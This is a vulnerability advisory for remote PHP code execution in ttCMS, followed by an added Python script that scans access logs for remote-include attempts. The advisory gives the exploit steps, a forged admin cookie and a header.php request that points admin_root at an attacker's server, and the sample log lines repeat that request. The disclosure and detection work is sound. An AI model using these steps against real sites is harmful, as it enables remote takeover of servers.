Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
Application: ttCMS v2.3 (and older versions)
Vendor: www.ttcms.com
Status: Vendor was contacted but didn't reply - after posting about another hole on his forums, my account was banned
Impact: Attacker can execute arbitrary PHP code
Platform(s): Unix

Technical description:
----------------------
Anyone can inject PHP code into ttCMS through the file "header.php", which can be found in the directory admin/templates/

header.php:
------------------------------------------
if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) {
    include_once("$admin_root/templates/header.inc.php");
} else {
    header("Location: $admin_root_url/login.php");
    exit;
}
------------------------------------------

All you have to do is send a fake cookie containing
------------------------------------------
ttcms_user_admin=1
------------------------------------------
(this can easily be done by using a tool like Proxomitron or Anonymity4Proxy)

In order to exploit this vulnerability, you have to create a file "templates/header.inc.php" on your own webserver, which contains the code you want to execute on the target system.

If you now call the file "header.php" like this:
------------------------------------------
http://target/admin/templates/header.php?admin_root=http://yourserver/
------------------------------------------
the code in "templates/header.inc.php" on your own webserver will be injected.
(Of course, PHP execution must be disabled on your machine, or you must use an FTP server to store the file you want to inject.)

Recommendations:
----------------
Run ttCMS in a secure environment.
Disable register_globals in php.ini
Update to a newer version of ttCMS (currently, none exists)
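
Until register_globals is disabled, the request described above can be spotted in the web server's access log, because it sets "admin_root" to a remote URL. The following is an added example, not part of the original advisory or of ttCMS: it assumes Apache combined log format, the function name is hypothetical, and the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format); all hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /admin/login.php HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [01/Jan/2004:10:02:13 +0000] "GET /admin/templates/header.php?admin_root=http://files.example.net/ HTTP/1.0" 200 97 "-" "Mozilla/4.0"
192.0.2.44 - - [01/Jan/2004:10:02:40 +0000] "GET /admin/templates/header.php?admin_root=FTP%3A%2F%2Ffiles.example.net%2F HTTP/1.0" 200 97 "-" "Mozilla/4.0"
192.0.2.10 - - [01/Jan/2004:10:05:00 +0000] "GET /index.php?ref=http://www.example.org/page HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# Variables the include path is built from; in this advisory that is admin_root.
INCLUDE_VARS = {"admin_root"}

def find_remote_include_attempts(log_text, include_vars=INCLUDE_VARS):
    """Return (client_ip, script_path, variable, value) for every request that
    sets an include-path variable to a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes once; unquote again to catch double encoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)
            if name in include_vars and REMOTE_SCHEME_RE.match(value):
                hits.append((client, parts.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print("remote include attempt:", hit)
```

With register_globals enabled the same variable can also arrive in a POST body or a cookie, which a default access log does not record, so an empty result here does not rule out an attempt.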